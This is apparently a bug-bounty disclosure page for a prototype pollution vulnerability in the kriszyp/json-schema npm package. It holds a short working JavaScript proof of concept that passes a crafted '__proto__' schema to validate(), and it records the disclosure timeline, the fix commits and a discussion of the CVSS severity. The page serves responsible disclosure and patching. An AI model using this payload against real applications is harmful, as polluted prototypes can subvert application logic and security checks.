Prototype Pollution in kriszyp/json-schema

Valid

Reported on

Oct 3rd 2021


Description

A constructed payload sent to validate will lead to prototype pollution.

Proof of Concept

// PoC.js
const { validate } = require("json-schema");
const instance = JSON.parse(`
{
  "$schema":{
    "type": "object",
    "properties":{
      "__proto__": {
        "type": "object",
        
        "properties":{
          "polluted": {
              "type": "string",
              "default": "polluted"
          }
        }
      }
    },
    "__proto__": {}
  }
}`);

const a = {};
console.log(a.polluted);
validate(instance);
console.log(a.polluted);

Impact

This vulnerability is capable of make prototype pollution

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the kriszyp/json-schema team and are waiting to hear back 2 months ago
Yoshino-s
2 months ago

Researcher


It seems that author fix this vuln by self, but I still found another way to bypass the fix, i have already send the poc and another fix to author, waiting for reply

We have sent a third and final follow up to the kriszyp/json-schema team. This report is stale. a month ago
Kris Zyp validated this vulnerability a month ago
Yoshino-s has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kris Zyp confirmed that a fix has been merged on 22f146 a month ago
The fix bounty has been dropped
validate.js#L202-L252 has been validated
Kris Zyp
a month ago

Maintainer


I think Yoshino-s should get the fix bounty too. Also, I wouldn't think this should be classified as "Critical", using json-schema with user-provided/arbitrary schemas is probably very rare, schemas typically have the same secure origination as code itself.

Jamie Slome
25 days ago

Admin


@kriszyp - can you confirm the severity that you think is more appropriate, then I will go ahead and update the published CVE! 👍

Jamie Slome
25 days ago

Admin


We can reward @yoshino-s the fix bounty as well. Can you attach a PR / commit from the researcher just to confirm this?

Kris Zyp
24 days ago

Maintainer


These commits were directly from yoshino-s's suggested code: https://github.com/kriszyp/json-schema/commit/f6f6a3b02d667aa4ba2d5d50cc19208c4462abfa https://github.com/kriszyp/json-schema/commit/b62f1da1ff5442f23443d6be6a92d00e65cba93a I would estimate severity (using the calculator at 7.7/High.

Jamie Slome
23 days ago

Admin


Can you recommend the CVSS string for this score?

Currently, it is:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

abbaskiko
2 days ago

Ok